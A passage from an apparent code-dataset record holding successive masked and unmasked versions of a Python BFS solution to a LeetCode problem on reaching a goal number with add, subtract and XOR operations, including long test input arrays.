116506422,671728835,280507922,-189039799,-565803074,-439924663,-14345985,-98428526,57303809,424685389,-84977856,-9251973,998935249,229402894,-405424548,448394272,182149207,-728030940,347577568,567511928,-27655302,400866779,-509269521,-580602375,405956020,-855173313,258091129,909162200,-315251598,-236890006,-531780379,342955474,-65890269,-111521851,-139906773,34939329,927781348,300458386,-603518159,341287362,-234266006,634183737,454833275,79631354,-954691672,102295826,688738167,-958428411,-293858940,480440548,590037773,-365477625,-425165732,170388756,164258145,-507355122,44132561,982798160,-101120201,-920959602,-239250887,534862084,-834736952,-123162323,389682556,656996523,864481760,381156936,129520066,-995551618,106129054,-471580461,856850511,653020333,531769579,-190375506,-992983956,73867968,-931909584,403329114,-945055546,627782991,-666011011,214665550,505169020,210703185,-591690068,11218620,790987020,561646751,-33552011,-407054835,-850936697,-838201457,-878394038,-759131062,-857347819,531582062,941614352,-743754869,650338718,178603580,-834368178,-976933957,138667533,746471721,551579035,-173400777,-1191455,320121832,-756997945,402594806,934711944,970489131,-193223639,276816990,842959026,-799673669,-367385466,681433973,468892554,-455199860,393993101,905435993,218314965,284795080,913357885,-652530417,743455659,869345718,808902357,829820413,7206928,544900359,225903242,-507688526,750219353,-663810717,-643969173,-269151675,348252329,-144351998,693995296,-692546103,869432378,650161259,568234384,710782517,179157604,-446849233,-922615096,-61183498,30945194,819052356,467911324,119876349,46908453,-420671619,344944591,889080726,-619477633,174882730,553799129,-941691933,146036558,-116064711,222282163,-272996845,-147041859,-381977096,-786757040,229096334,712541239,326039628,-952490563,-362214129,-680530864,421358212,-472290821,-331398150,-42297937,-393141325,-467541333,655524006,452908624,-626562356,-758303565,338224482,312047704,599445442,-3
28430584,259549134,838272865,-755896597,-151000710,607787908,11870257,-680877184,528161590,769242561,-447486537,-127579653,135915595,-271181270,12536315,693445551,900639800,-692327759,-671179999,977783490,935798407,659688020,-478438023,-852131846,-900332354,-71029072,888095095,924175448,430392829,391195112,399460998,-173259008,-168543477,-495967896,-697314804,591126097,301126906,946273416,-772817341,-996445410,466876435,-92937212,-226599286,43831927,-588596503,-55759661,212885530,-805455693,572269060,415773175,-320900489,-651775079,5276363,91615150,-882588415,502210147,-401039810,26713405,-723806893,125439289,472777644,869504248,967552969,-268043646,-146710780,-511973692,-803204681,-146827180,-453201623,-878534466,631307563,507752930,-63646026,-348120807,222898965,-410732708,617953050,-478244422,877782569,-507956686,-196516478,-477074335,329039585,-480651334,-890030740,461391919,-977815738,-943937849,321402466,-588396975,-945139052,871313567,-484830305,365305963,891985414,466048577,880607400,-245705654,359506342,-612177301,840415132,693541406,707348310,971762025,-871678269,897143169,625100531,743908163,-315815019,-63211252,-962051459,510469141,566817231,-186207711,309838979,101194721,-127111899,-109107404,-702499174,918781433,34041307,927374088,-67369303,-680339659,202481166,-218771120,329951816,-280782626,-423403505,619779171,-567310903,-660420942,756801677,996208091,822990010,940351540,1331227,382201579,891956260,-894584436,346600029,805733487,-691767750,859030444,1] print(Solution().minimumOperations(nums, 938, 80))
normal
{ "blob_id": "50b2b9d1edc8eaa44050e2b3b2375e966f16e10c", "index": 6997, "step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\nif __name__ == '__main__':\n print(Solution().minimumOperations(nums=[2, 4, 12], start=2, goal=12))\n print(Solution().minimumOperations(nums=[3, 5, 7], start=0, goal=-4))\n print(Solution().minimumOperations(nums=[2, 8, 16], start=0, goal=1))\n nums = [-574083075, -393928592, -508025046, 942818778, 355796909, \n 515245901, 40297943, 106087952, 112856312, -516143616, 363801856, \n 431681353, 726373078, 947630603, 357311001, 594181298, -797268217, \n -741740009, 310972287, 588107527, -535699426, 56324906, -77958073, \n 739798122, -839472160, 439902753, -599749231, -378067373, -\n 466272504, -668036170, 404827976, 805486978, -762507067, 726001618,\n -761047930, 574054980, 365793614, 112020312, 612806855, -256862366,\n 174046424, 646109365, 263765015, 952305939, 864217737, -236873371, \n -991807014, 365730786, -908194963, -778205177, -949314048, -\n 636570500, -883257881, 316313456, -846577965, 132287864, -143230736,\n 425542510, -99852882, -845180792, -329895545, 402782707, -52191127,\n -470380017, -788836785, -655887976, -899430590, 481923982, 45348738,\n -595401481, -470990760, -417390352, -570278840, -873871723, -\n 905595403, 276201114, -733014032, 126018863, 452235438, -512574658,\n -172220362, 845468743, -743189114, 597319839, -584451932, 410604481,\n -508885990, -670396751, -765996786, 345814977, -920014372, -\n 826696704, 640912714, 119494504, 745808962, -503060001, -677959595,\n -831428592, 282855843, 150678167, -467803553, -503929808, 636431692,\n -235369757, -964826080, 93942566, -65314422, -385277528, -379647659,\n 601981747, -724269861, -516713072, -487487495, 655771565, 406499531,\n -943540581, -290169291, 438686645, -227355533, -822612523, \n 218329747, -800810927, -944724740, -978181517, 274815523, 296317841,\n 56043572, -712672386, -374759873, 86973233, -246165119, 73819230, -\n 801140338, 414767806, 883318746, -822063159, -705772942, -674915800,\n 710520717, -97115365, 599549847, 115344568, 53002314, 242487774, -\n 665998906, -986068895, -844909606, -515222297, -500827406, \n 317865850, -50395059, 522417393, 51184184, 241544846, -996297136, -\n 227251827, 924359619, 822815774, 149467545, 523511343, 252991991, \n 450254984, -393459583, 617410075, 197030479, -234418418, -256650708,\n 872334551, 779068346, 216294504, -708680875, -171498970, -970211466,\n -176493993, 729939373, -658054782, -342680218, 75508900, -377139149,\n 392008859, 121412250, -163586626, -468148273, 624248706, 50004864, \n -862378428, -849927586, 33598413, -157654824, -229712613, 149116317,\n 183820138, 378717707, -995563605, 777654910, 511275580, 
-157964872,\n -718605034, -764316227, -225837302, -166208500, -587688677, \n 78982205, -488693575, 667205793, 419165994, 731543316, 97551954, -\n 387317666, -580873271, 533504431, -31624036, -356035140, -849089082,\n -767376392, -625237600, 940717947, -337709497, 915255567, 727274007,\n -879463448, -363148174, -854892492, 110472344, -466194659, -\n 146843198, -454944217, -365338018, -349424052, 994474446, -\n 554968068, -883734951, -697723265, 583756420, -5696410, -413731452,\n -278706136, -399245668, 83345207, -227231270, 618384545, 846514423,\n -556667092, 590460194, -686116067, -509669269, -510065093, 77094171,\n 270317951, 166095128, -918526061, -766370855, -20861321, 478791777,\n 663673443, -152055285, 224745414, 123998803, 66824877, -85117337, \n 212126175, -718523523, 615359230, -212148589, 620733736, -81197397,\n 51814471, 709312024, 562145805, -770811828, 321230393, -611636320, \n -421337549, -804527290, -416739656, -886764000, 170695026, \n 414273830, -449987380, -56782953, 772039002, -961265403, -896009751,\n -524231358, 497253209, -507048459, -308522246, -508249054, -\n 53240581, -241704483, -974133571, 232897679, -152365934, -861310248,\n -305766289, 340680726, 844612779, -180227470, 40798478, 729446447, \n 395975250, -142447074, -606021375, 47555730, 294446347, 452346091, \n -409427076, -845574381, -838995437, 45787728, 714700474, -315824001,\n 694717388, 502723269, 119244099, -538412679, -207297135, -189078560,\n -812610469, -350061253, -73975237, -119323509, 791863263, 741180208,\n 740488891, -475394166, -191585617, -441527154, 767292531, 201222965,\n -150196525, 588513813, 245328283, 396662663, 100705864, 126789247, \n 487161165, -460512081, -469521559, -998848254, -917609155, \n 314537168, 418002454, -926920818, -628671538, 179971032, -105401559,\n 449618919, 823404672, 178494651, -773108884, 10686795, -506642993, \n -60172121, -510142552, 651623281, -163851428, 158562600, -782456228,\n -336697076, -571952851, 849878818, -456510759, -65997243, -\n 506043404, -558981572, 186946604, 124948039, 954065944, 707437320, \n -224056616, -319237038, 512138196, 742466011, -49725596, -784781640,\n -753413026, -331602365, -246166733, -658650959, -4888181, -\n 547553549, 786689548, -866846384, -212028209, -98029403, -325422497,\n -409855095, 320083382, -491251215, -471713326, 890922019, -\n 766590943, -481641953, -227197451, -709166930, -965945544, \n 407688175, -78385698, -372800469, 389036825, 79885300, -858488452, \n -390177477, 233839191, -518116358, 420408256, 872470025, 241770824,\n -106901417, -328631191, 548580365, -88408815, -647601013, 658880218,\n -870455388, 277154380, 370022702, -381519264, -800726224, 183685380,\n 208169777, 925905330, 732494840, 251754641, -681988029, 593628349, \n 153852085, 353590607, 242118102, -788094641, -242801844, 474214244,\n 579450364, 580046580, -269927114, 249739292, 295331955, -544556236,\n -814569172, 808895922, 707421114, 305101587, 621173158, -248896453,\n 988552702, -375313331, -87289858, -796466539, -529411285, -\n 197315984, 33984203, -122839651, -90735568, 277265491, 762059774, -\n 628018119, -406508643, -856856769, 364613737, 59319066, 614382155, \n -614620718, -133957131, -394985422, -29943491, 154443077, -72727846,\n 392096990, 562681453, 364248049, -156700958, 717335155, -343408748,\n 77301840, -155372684, -432114609, 414752267, -485732822, 876096548,\n 842614035, -614245110, -872219121, 291509502, 334817026, 214330487,\n 405297459, -449582485, 789314834, 936409758, 452350380, -146649749,\n 898255045, 116506422, 671728835, 
280507922, -189039799, -565803074,\n -439924663, -14345985, -98428526, 57303809, 424685389, -84977856, -\n 9251973, 998935249, 229402894, -405424548, 448394272, 182149207, -\n 728030940, 347577568, 567511928, -27655302, 400866779, -509269521, \n -580602375, 405956020, -855173313, 258091129, 909162200, -315251598,\n -236890006, -531780379, 342955474, -65890269, -111521851, -\n 139906773, 34939329, 927781348, 300458386, -603518159, 341287362, -\n 234266006, 634183737, 454833275, 79631354, -954691672, 102295826, \n 688738167, -958428411, -293858940, 480440548, 590037773, -365477625,\n -425165732, 170388756, 164258145, -507355122, 44132561, 982798160, \n -101120201, -920959602, -239250887, 534862084, -834736952, -\n 123162323, 389682556, 656996523, 864481760, 381156936, 129520066, -\n 995551618, 106129054, -471580461, 856850511, 653020333, 531769579, \n -190375506, -992983956, 73867968, -931909584, 403329114, -945055546,\n 627782991, -666011011, 214665550, 505169020, 210703185, -591690068,\n 11218620, 790987020, 561646751, -33552011, -407054835, -850936697, \n -838201457, -878394038, -759131062, -857347819, 531582062, \n 941614352, -743754869, 650338718, 178603580, -834368178, -976933957,\n 138667533, 746471721, 551579035, -173400777, -1191455, 320121832, -\n 756997945, 402594806, 934711944, 970489131, -193223639, 276816990, \n 842959026, -799673669, -367385466, 681433973, 468892554, -455199860,\n 393993101, 905435993, 218314965, 284795080, 913357885, -652530417, \n 743455659, 869345718, 808902357, 829820413, 7206928, 544900359, \n 225903242, -507688526, 750219353, -663810717, -643969173, -\n 269151675, 348252329, -144351998, 693995296, -692546103, 869432378,\n 650161259, 568234384, 710782517, 179157604, -446849233, -922615096,\n -61183498, 30945194, 819052356, 467911324, 119876349, 46908453, -\n 420671619, 344944591, 889080726, -619477633, 174882730, 553799129, \n -941691933, 146036558, -116064711, 222282163, -272996845, -\n 147041859, -381977096, -786757040, 229096334, 712541239, 326039628,\n -952490563, -362214129, -680530864, 421358212, -472290821, -\n 331398150, -42297937, -393141325, -467541333, 655524006, 452908624,\n -626562356, -758303565, 338224482, 312047704, 599445442, -328430584,\n 259549134, 838272865, -755896597, -151000710, 607787908, 11870257, \n -680877184, 528161590, 769242561, -447486537, -127579653, 135915595,\n -271181270, 12536315, 693445551, 900639800, -692327759, -671179999,\n 977783490, 935798407, 659688020, -478438023, -852131846, -900332354,\n -71029072, 888095095, 924175448, 430392829, 391195112, 399460998, -\n 173259008, -168543477, -495967896, -697314804, 591126097, 301126906,\n 946273416, -772817341, -996445410, 466876435, -92937212, -226599286,\n 43831927, -588596503, -55759661, 212885530, -805455693, 572269060, \n 415773175, -320900489, -651775079, 5276363, 91615150, -882588415, \n 502210147, -401039810, 26713405, -723806893, 125439289, 472777644, \n 869504248, 967552969, -268043646, -146710780, -511973692, -\n 803204681, -146827180, -453201623, -878534466, 631307563, 507752930,\n -63646026, -348120807, 222898965, -410732708, 617953050, -478244422,\n 877782569, -507956686, -196516478, -477074335, 329039585, -\n 480651334, -890030740, 461391919, -977815738, -943937849, 321402466,\n -588396975, -945139052, 871313567, -484830305, 365305963, 891985414,\n 466048577, 880607400, -245705654, 359506342, -612177301, 840415132,\n 693541406, 707348310, 971762025, -871678269, 897143169, 625100531, \n 743908163, -315815019, -63211252, -962051459, 510469141, 566817231,\n 
-186207711, 309838979, 101194721, -127111899, -109107404, -\n 702499174, 918781433, 34041307, 927374088, -67369303, -680339659, \n 202481166, -218771120, 329951816, -280782626, -423403505, 619779171,\n -567310903, -660420942, 756801677, 996208091, 822990010, 940351540,\n 1331227, 382201579, 891956260, -894584436, 346600029, 805733487, -\n 691767750, 859030444, 1]\n print(Solution().minimumOperations(nums, 938, 80))\n", "step-4": "<mask token>\nfrom typing import List\nfrom collections import deque\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\nif __name__ == '__main__':\n print(Solution().minimumOperations(nums=[2, 4, 12], start=2, goal=12))\n print(Solution().minimumOperations(nums=[3, 5, 7], start=0, goal=-4))\n print(Solution().minimumOperations(nums=[2, 8, 16], start=0, goal=1))\n nums = [-574083075, -393928592, -508025046, 942818778, 355796909, \n 515245901, 40297943, 106087952, 112856312, -516143616, 363801856, \n 431681353, 726373078, 947630603, 357311001, 594181298, -797268217, \n -741740009, 310972287, 588107527, -535699426, 56324906, -77958073, \n 739798122, -839472160, 439902753, -599749231, -378067373, -\n 466272504, -668036170, 404827976, 805486978, -762507067, 726001618,\n -761047930, 574054980, 365793614, 112020312, 612806855, -256862366,\n 174046424, 646109365, 263765015, 952305939, 864217737, -236873371, \n -991807014, 365730786, -908194963, -778205177, -949314048, -\n 636570500, -883257881, 316313456, -846577965, 132287864, -143230736,\n 425542510, -99852882, -845180792, -329895545, 402782707, -52191127,\n -470380017, -788836785, -655887976, -899430590, 481923982, 45348738,\n -595401481, -470990760, -417390352, -570278840, -873871723, -\n 905595403, 276201114, -733014032, 126018863, 452235438, -512574658,\n -172220362, 845468743, -743189114, 597319839, -584451932, 410604481,\n -508885990, -670396751, -765996786, 345814977, -920014372, -\n 826696704, 640912714, 119494504, 745808962, -503060001, -677959595,\n -831428592, 282855843, 150678167, -467803553, -503929808, 636431692,\n -235369757, -964826080, 93942566, -65314422, -385277528, -379647659,\n 601981747, -724269861, -516713072, -487487495, 655771565, 406499531,\n -943540581, -290169291, 438686645, -227355533, -822612523, \n 218329747, -800810927, -944724740, -978181517, 274815523, 296317841,\n 56043572, -712672386, -374759873, 86973233, -246165119, 73819230, -\n 801140338, 414767806, 883318746, -822063159, -705772942, -674915800,\n 710520717, -97115365, 599549847, 115344568, 53002314, 242487774, -\n 665998906, -986068895, -844909606, -515222297, -500827406, \n 317865850, -50395059, 522417393, 51184184, 241544846, -996297136, -\n 227251827, 924359619, 822815774, 149467545, 523511343, 252991991, \n 450254984, -393459583, 617410075, 197030479, -234418418, -256650708,\n 872334551, 779068346, 216294504, -708680875, -171498970, -970211466,\n -176493993, 729939373, -658054782, -342680218, 75508900, -377139149,\n 392008859, 121412250, -163586626, -468148273, 624248706, 50004864, \n -862378428, -849927586, 33598413, -157654824, -229712613, 149116317,\n 183820138, 378717707, -995563605, 777654910, 511275580, -157964872,\n -718605034, -764316227, -225837302, -166208500, -587688677, \n 78982205, -488693575, 
667205793, 419165994, 731543316, 97551954, -\n 387317666, -580873271, 533504431, -31624036, -356035140, -849089082,\n -767376392, -625237600, 940717947, -337709497, 915255567, 727274007,\n -879463448, -363148174, -854892492, 110472344, -466194659, -\n 146843198, -454944217, -365338018, -349424052, 994474446, -\n 554968068, -883734951, -697723265, 583756420, -5696410, -413731452,\n -278706136, -399245668, 83345207, -227231270, 618384545, 846514423,\n -556667092, 590460194, -686116067, -509669269, -510065093, 77094171,\n 270317951, 166095128, -918526061, -766370855, -20861321, 478791777,\n 663673443, -152055285, 224745414, 123998803, 66824877, -85117337, \n 212126175, -718523523, 615359230, -212148589, 620733736, -81197397,\n 51814471, 709312024, 562145805, -770811828, 321230393, -611636320, \n -421337549, -804527290, -416739656, -886764000, 170695026, \n 414273830, -449987380, -56782953, 772039002, -961265403, -896009751,\n -524231358, 497253209, -507048459, -308522246, -508249054, -\n 53240581, -241704483, -974133571, 232897679, -152365934, -861310248,\n -305766289, 340680726, 844612779, -180227470, 40798478, 729446447, \n 395975250, -142447074, -606021375, 47555730, 294446347, 452346091, \n -409427076, -845574381, -838995437, 45787728, 714700474, -315824001,\n 694717388, 502723269, 119244099, -538412679, -207297135, -189078560,\n -812610469, -350061253, -73975237, -119323509, 791863263, 741180208,\n 740488891, -475394166, -191585617, -441527154, 767292531, 201222965,\n -150196525, 588513813, 245328283, 396662663, 100705864, 126789247, \n 487161165, -460512081, -469521559, -998848254, -917609155, \n 314537168, 418002454, -926920818, -628671538, 179971032, -105401559,\n 449618919, 823404672, 178494651, -773108884, 10686795, -506642993, \n -60172121, -510142552, 651623281, -163851428, 158562600, -782456228,\n -336697076, -571952851, 849878818, -456510759, -65997243, -\n 506043404, -558981572, 186946604, 124948039, 954065944, 707437320, \n -224056616, -319237038, 512138196, 742466011, -49725596, -784781640,\n -753413026, -331602365, -246166733, -658650959, -4888181, -\n 547553549, 786689548, -866846384, -212028209, -98029403, -325422497,\n -409855095, 320083382, -491251215, -471713326, 890922019, -\n 766590943, -481641953, -227197451, -709166930, -965945544, \n 407688175, -78385698, -372800469, 389036825, 79885300, -858488452, \n -390177477, 233839191, -518116358, 420408256, 872470025, 241770824,\n -106901417, -328631191, 548580365, -88408815, -647601013, 658880218,\n -870455388, 277154380, 370022702, -381519264, -800726224, 183685380,\n 208169777, 925905330, 732494840, 251754641, -681988029, 593628349, \n 153852085, 353590607, 242118102, -788094641, -242801844, 474214244,\n 579450364, 580046580, -269927114, 249739292, 295331955, -544556236,\n -814569172, 808895922, 707421114, 305101587, 621173158, -248896453,\n 988552702, -375313331, -87289858, -796466539, -529411285, -\n 197315984, 33984203, -122839651, -90735568, 277265491, 762059774, -\n 628018119, -406508643, -856856769, 364613737, 59319066, 614382155, \n -614620718, -133957131, -394985422, -29943491, 154443077, -72727846,\n 392096990, 562681453, 364248049, -156700958, 717335155, -343408748,\n 77301840, -155372684, -432114609, 414752267, -485732822, 876096548,\n 842614035, -614245110, -872219121, 291509502, 334817026, 214330487,\n 405297459, -449582485, 789314834, 936409758, 452350380, -146649749,\n 898255045, 116506422, 671728835, 280507922, -189039799, -565803074,\n -439924663, -14345985, -98428526, 57303809, 424685389, -84977856, -\n 
9251973, 998935249, 229402894, -405424548, 448394272, 182149207, -\n 728030940, 347577568, 567511928, -27655302, 400866779, -509269521, \n -580602375, 405956020, -855173313, 258091129, 909162200, -315251598,\n -236890006, -531780379, 342955474, -65890269, -111521851, -\n 139906773, 34939329, 927781348, 300458386, -603518159, 341287362, -\n 234266006, 634183737, 454833275, 79631354, -954691672, 102295826, \n 688738167, -958428411, -293858940, 480440548, 590037773, -365477625,\n -425165732, 170388756, 164258145, -507355122, 44132561, 982798160, \n -101120201, -920959602, -239250887, 534862084, -834736952, -\n 123162323, 389682556, 656996523, 864481760, 381156936, 129520066, -\n 995551618, 106129054, -471580461, 856850511, 653020333, 531769579, \n -190375506, -992983956, 73867968, -931909584, 403329114, -945055546,\n 627782991, -666011011, 214665550, 505169020, 210703185, -591690068,\n 11218620, 790987020, 561646751, -33552011, -407054835, -850936697, \n -838201457, -878394038, -759131062, -857347819, 531582062, \n 941614352, -743754869, 650338718, 178603580, -834368178, -976933957,\n 138667533, 746471721, 551579035, -173400777, -1191455, 320121832, -\n 756997945, 402594806, 934711944, 970489131, -193223639, 276816990, \n 842959026, -799673669, -367385466, 681433973, 468892554, -455199860,\n 393993101, 905435993, 218314965, 284795080, 913357885, -652530417, \n 743455659, 869345718, 808902357, 829820413, 7206928, 544900359, \n 225903242, -507688526, 750219353, -663810717, -643969173, -\n 269151675, 348252329, -144351998, 693995296, -692546103, 869432378,\n 650161259, 568234384, 710782517, 179157604, -446849233, -922615096,\n -61183498, 30945194, 819052356, 467911324, 119876349, 46908453, -\n 420671619, 344944591, 889080726, -619477633, 174882730, 553799129, \n -941691933, 146036558, -116064711, 222282163, -272996845, -\n 147041859, -381977096, -786757040, 229096334, 712541239, 326039628,\n -952490563, -362214129, -680530864, 421358212, -472290821, -\n 331398150, -42297937, -393141325, -467541333, 655524006, 452908624,\n -626562356, -758303565, 338224482, 312047704, 599445442, -328430584,\n 259549134, 838272865, -755896597, -151000710, 607787908, 11870257, \n -680877184, 528161590, 769242561, -447486537, -127579653, 135915595,\n -271181270, 12536315, 693445551, 900639800, -692327759, -671179999,\n 977783490, 935798407, 659688020, -478438023, -852131846, -900332354,\n -71029072, 888095095, 924175448, 430392829, 391195112, 399460998, -\n 173259008, -168543477, -495967896, -697314804, 591126097, 301126906,\n 946273416, -772817341, -996445410, 466876435, -92937212, -226599286,\n 43831927, -588596503, -55759661, 212885530, -805455693, 572269060, \n 415773175, -320900489, -651775079, 5276363, 91615150, -882588415, \n 502210147, -401039810, 26713405, -723806893, 125439289, 472777644, \n 869504248, 967552969, -268043646, -146710780, -511973692, -\n 803204681, -146827180, -453201623, -878534466, 631307563, 507752930,\n -63646026, -348120807, 222898965, -410732708, 617953050, -478244422,\n 877782569, -507956686, -196516478, -477074335, 329039585, -\n 480651334, -890030740, 461391919, -977815738, -943937849, 321402466,\n -588396975, -945139052, 871313567, -484830305, 365305963, 891985414,\n 466048577, 880607400, -245705654, 359506342, -612177301, 840415132,\n 693541406, 707348310, 971762025, -871678269, 897143169, 625100531, \n 743908163, -315815019, -63211252, -962051459, 510469141, 566817231,\n -186207711, 309838979, 101194721, -127111899, -109107404, -\n 702499174, 918781433, 34041307, 927374088, 
-67369303, -680339659, \n 202481166, -218771120, 329951816, -280782626, -423403505, 619779171,\n -567310903, -660420942, 756801677, 996208091, 822990010, 940351540,\n 1331227, 382201579, 891956260, -894584436, 346600029, 805733487, -\n 691767750, 859030444, 1]\n print(Solution().minimumOperations(nums, 938, 80))\n", "step-5": "'''\n-Medium-\n*BFS*\n\nYou are given a 0-indexed integer array nums containing distinct numbers, an integer start, and an integer goal. There is an integer x that is initially set to start, and you want to perform operations on x such that it is converted to goal. You can perform the following operation repeatedly on the number x:\n\nIf 0 <= x <= 1000, then for any index i in the array (0 <= i < nums.length), you can set x to any of the following:\n\nx + nums[i]\nx - nums[i]\nx ^ nums[i] (bitwise-XOR)\nNote that you can use each nums[i] any number of times in any order. Operations that set x to be out of the range 0 <= x <= 1000 are valid, but no more operations can be done afterward.\n\nReturn the minimum number of operations needed to convert x = start into goal, and -1 if it is not possible.\n\n \n\nExample 1:\n\nInput: nums = [2,4,12], start = 2, goal = 12\nOutput: 2\nExplanation: We can go from 2 → 14 → 12 with the following 2 operations.\n- 2 + 12 = 14\n- 14 - 2 = 12\nExample 2:\n\nInput: nums = [3,5,7], start = 0, goal = -4\nOutput: 2\nExplanation: We can go from 0 → 3 → -4 with the following 2 operations. \n- 0 + 3 = 3\n- 3 - 7 = -4\nNote that the last operation sets x out of the range 0 <= x <= 1000, which is valid.\nExample 3:\n\nInput: nums = [2,8,16], start = 0, goal = 1\nOutput: -1\nExplanation: There is no way to convert 0 into 1.\n \n\nConstraints:\n\n1 <= nums.length <= 1000\n-109 <= nums[i], goal <= 109\n0 <= start <= 1000\nstart != goal\nAll the integers in nums are distinct.\n\n\n'''\n\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def minimumOperations(self, nums: List[int], start: int, goal: int) -> int:\n \n que = deque([(start,0)]) \n visited = set() \n while que:\n x, steps = que.popleft() \n for i in nums:\n for t in [x+i, x-i, x^i]:\n if t == goal: return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps+1))\n return -1\n\n \n\n\n\n \n\n\nif __name__ == \"__main__\":\n print(Solution().minimumOperations(nums = [2,4,12], start = 2, goal = 12))\n print(Solution().minimumOperations(nums = [3,5,7], start = 0, goal = -4))\n print(Solution().minimumOperations(nums = [2,8,16], start = 0, goal = 1))\n nums = 
[-574083075,-393928592,-508025046,942818778,355796909,515245901,40297943,106087952,112856312,-516143616,363801856,431681353,726373078,947630603,357311001,594181298,-797268217,-741740009,310972287,588107527,-535699426,56324906,-77958073,739798122,-839472160,439902753,-599749231,-378067373,-466272504,-668036170,404827976,805486978,-762507067,726001618,-761047930,574054980,365793614,112020312,612806855,-256862366,174046424,646109365,263765015,952305939,864217737,-236873371,-991807014,365730786,-908194963,-778205177,-949314048,-636570500,-883257881,316313456,-846577965,132287864,-143230736,425542510,-99852882,-845180792,-329895545,402782707,-52191127,-470380017,-788836785,-655887976,-899430590,481923982,45348738,-595401481,-470990760,-417390352,-570278840,-873871723,-905595403,276201114,-733014032,126018863,452235438,-512574658,-172220362,845468743,-743189114,597319839,-584451932,410604481,-508885990,-670396751,-765996786,345814977,-920014372,-826696704,640912714,119494504,745808962,-503060001,-677959595,-831428592,282855843,150678167,-467803553,-503929808,636431692,-235369757,-964826080,93942566,-65314422,-385277528,-379647659,601981747,-724269861,-516713072,-487487495,655771565,406499531,-943540581,-290169291,438686645,-227355533,-822612523,218329747,-800810927,-944724740,-978181517,274815523,296317841,56043572,-712672386,-374759873,86973233,-246165119,73819230,-801140338,414767806,883318746,-822063159,-705772942,-674915800,710520717,-97115365,599549847,115344568,53002314,242487774,-665998906,-986068895,-844909606,-515222297,-500827406,317865850,-50395059,522417393,51184184,241544846,-996297136,-227251827,924359619,822815774,149467545,523511343,252991991,450254984,-393459583,617410075,197030479,-234418418,-256650708,872334551,779068346,216294504,-708680875,-171498970,-970211466,-176493993,729939373,-658054782,-342680218,75508900,-377139149,392008859,121412250,-163586626,-468148273,624248706,50004864,-862378428,-849927586,33598413,-157654824,-229712613,149116317,183820138,378717707,-995563605,777654910,511275580,-157964872,-718605034,-764316227,-225837302,-166208500,-587688677,78982205,-488693575,667205793,419165994,731543316,97551954,-387317666,-580873271,533504431,-31624036,-356035140,-849089082,-767376392,-625237600,940717947,-337709497,915255567,727274007,-879463448,-363148174,-854892492,110472344,-466194659,-146843198,-454944217,-365338018,-349424052,994474446,-554968068,-883734951,-697723265,583756420,-5696410,-413731452,-278706136,-399245668,83345207,-227231270,618384545,846514423,-556667092,590460194,-686116067,-509669269,-510065093,77094171,270317951,166095128,-918526061,-766370855,-20861321,478791777,663673443,-152055285,224745414,123998803,66824877,-85117337,212126175,-718523523,615359230,-212148589,620733736,-81197397,51814471,709312024,562145805,-770811828,321230393,-611636320,-421337549,-804527290,-416739656,-886764000,170695026,414273830,-449987380,-56782953,772039002,-961265403,-896009751,-524231358,497253209,-507048459,-308522246,-508249054,-53240581,-241704483,-974133571,232897679,-152365934,-861310248,-305766289,340680726,844612779,-180227470,40798478,729446447,395975250,-142447074,-606021375,47555730,294446347,452346091,-409427076,-845574381,-838995437,45787728,714700474,-315824001,694717388,502723269,119244099,-538412679,-207297135,-189078560,-812610469,-350061253,-73975237,-119323509,791863263,741180208,740488891,-475394166,-191585617,-441527154,767292531,201222965,-150196525,588513813,245328283,396662663,100705864,126789247,487161165,-460512081,-469521559,-998848254,-917
609155,314537168,418002454,-926920818,-628671538,179971032,-105401559,449618919,823404672,178494651,-773108884,10686795,-506642993,-60172121,-510142552,651623281,-163851428,158562600,-782456228,-336697076,-571952851,849878818,-456510759,-65997243,-506043404,-558981572,186946604,124948039,954065944,707437320,-224056616,-319237038,512138196,742466011,-49725596,-784781640,-753413026,-331602365,-246166733,-658650959,-4888181,-547553549,786689548,-866846384,-212028209,-98029403,-325422497,-409855095,320083382,-491251215,-471713326,890922019,-766590943,-481641953,-227197451,-709166930,-965945544,407688175,-78385698,-372800469,389036825,79885300,-858488452,-390177477,233839191,-518116358,420408256,872470025,241770824,-106901417,-328631191,548580365,-88408815,-647601013,658880218,-870455388,277154380,370022702,-381519264,-800726224,183685380,208169777,925905330,732494840,251754641,-681988029,593628349,153852085,353590607,242118102,-788094641,-242801844,474214244,579450364,580046580,-269927114,249739292,295331955,-544556236,-814569172,808895922,707421114,305101587,621173158,-248896453,988552702,-375313331,-87289858,-796466539,-529411285,-197315984,33984203,-122839651,-90735568,277265491,762059774,-628018119,-406508643,-856856769,364613737,59319066,614382155,-614620718,-133957131,-394985422,-29943491,154443077,-72727846,392096990,562681453,364248049,-156700958,717335155,-343408748,77301840,-155372684,-432114609,414752267,-485732822,876096548,842614035,-614245110,-872219121,291509502,334817026,214330487,405297459,-449582485,789314834,936409758,452350380,-146649749,898255045,116506422,671728835,280507922,-189039799,-565803074,-439924663,-14345985,-98428526,57303809,424685389,-84977856,-9251973,998935249,229402894,-405424548,448394272,182149207,-728030940,347577568,567511928,-27655302,400866779,-509269521,-580602375,405956020,-855173313,258091129,909162200,-315251598,-236890006,-531780379,342955474,-65890269,-111521851,-139906773,34939329,927781348,300458386,-603518159,341287362,-234266006,634183737,454833275,79631354,-954691672,102295826,688738167,-958428411,-293858940,480440548,590037773,-365477625,-425165732,170388756,164258145,-507355122,44132561,982798160,-101120201,-920959602,-239250887,53486